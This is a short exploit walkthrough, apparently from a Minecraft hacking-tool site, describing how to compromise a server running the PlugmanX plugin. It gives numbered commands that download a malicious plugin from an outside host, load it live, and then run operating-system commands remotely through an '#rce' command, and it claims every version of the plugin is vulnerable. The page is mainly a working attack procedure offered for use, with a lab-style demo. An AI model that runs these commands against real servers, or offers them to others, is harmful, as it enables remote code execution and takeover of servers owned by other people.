Plugman X

PluginManager is a simple plugin manager. The problem with this plugin is that it allows you to download plugins from unofficial sites.

How the exploit works

The exploit is based on using the /plugman download command to download a malicious plugin to compromise the server.

How to use the exploit

To perform this exploit, the PluginManager /plugman download command must be enabled, then enter the following:

01

Download the malicious plugin

In this example, a malicious test plugin created by me is attached.

$
/pm download direct https://mcptoolspigotrce.mcptool.net/ RCE
02

Load the infected plugin

Load the plugin without restarting the server

$
/pm load RCE
03

Test the infected plugin

Check that the plugin has loaded correctly

$
#rce help
04

Run a command on the server operating system

Commands can now be executed remotely using the #rce command. In this example I use a command to open the notepad of my PC where the server is hosted.

$
#rce cmd start notepad.exe

Vulnerable versions

This plugin is vulnerable in all versions to date.

Try it yourself

You can download a server with everything you need to test the exploit locally on your PC from this link.

← PlugmanX Exploit Holographic Displays Exploit →